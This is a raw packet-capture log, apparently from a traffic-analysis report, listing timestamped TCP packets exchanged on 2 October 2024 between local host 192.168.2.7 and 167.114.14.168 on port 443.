                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189563036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189601898 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189610958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189625978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189675093 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.189944029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190000057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190042973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190049887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190087080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190087080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190160036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190207005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190236092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190242052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190269947 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190289974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.190999985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191044092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191082001 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191092968 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191128016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191128016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191143990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191195011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191226006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191232920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191251993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191299915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191940069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.191987038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192023993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192030907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192066908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192068100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192080975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192126989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192166090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192173004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192186117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192261934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192941904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.192994118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193053961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193053961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193063974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193133116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193816900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193867922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193932056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193933010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193939924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.193983078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194003105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194046021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194103003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194103003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194111109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194163084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194595098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194647074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194694042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194703102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194742918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194742918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194844007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194895029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194941044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194948912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.194958925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195013046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195692062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195733070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195766926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195772886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195812941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195812941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195852995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195903063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195956945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195956945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.195965052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.196013927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.196398973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.196453094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.196508884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.196508884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.196517944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.196629047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.219405890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.219458103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.219518900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.219527960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.219578028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.219578028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.220963955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221013069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221055984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221062899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221092939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221092939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221471071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221525908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221574068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221581936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221597910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.221635103 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223114967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223160982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223206997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223216057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223226070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223272085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223534107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223581076 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223622084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223629951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223639965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223704100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223886967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223936081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223959923 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.223965883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224010944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224010944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224266052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224318981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224359035 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224365950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224389076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.224477053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.234046936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.234091997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.234137058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.234146118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.234181881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.234181881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.310185909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.310252905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.310292959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.310317039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.310359955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.310359955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.311578989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.311625957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.311662912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.311675072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.311698914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.311713934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.312263012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.312304020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.312361002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.312371969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.312411070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.312411070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.313568115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.313613892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.313678980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.313678980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.313692093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.313745022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.314409018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.314465046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.314510107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.314521074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.314563036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.314563036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315495968 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315560102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315620899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315620899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315629959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315680981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315745115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315800905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315850019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315857887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315895081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.315895081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.328108072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.328138113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.328210115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.328210115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.328222036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.328279972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.400616884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.400649071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.400737047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.400737047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.400752068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.400796890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402240992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402275085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402349949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402349949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402358055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402406931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402790070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402817965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402861118 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402867079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402896881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.402945042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404154062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404181004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404248953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404248953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404258966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404303074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404957056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.404983044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405035973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405045986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405057907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405143023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405878067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405914068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405953884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405958891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.405992985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.406014919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.406240940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.406269073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.406310081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.406316042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.406342983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.406351089 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.418657064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.418697119 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.418747902 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.418756962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.418793917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.418793917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.491580009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.491625071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.491799116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.491818905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.491923094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.492643118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.492676020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.492784023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.492790937 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.492950916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.493338108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.493362904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.493488073 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.493494987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.493578911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.494656086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.494684935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.494745016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.494750977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.494792938 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.494792938 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.495476007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.495508909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.495573044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.495582104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.495590925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.495649099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496417999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496444941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:51.496512890 CEST49713443192.168.2.7167.114.14.168
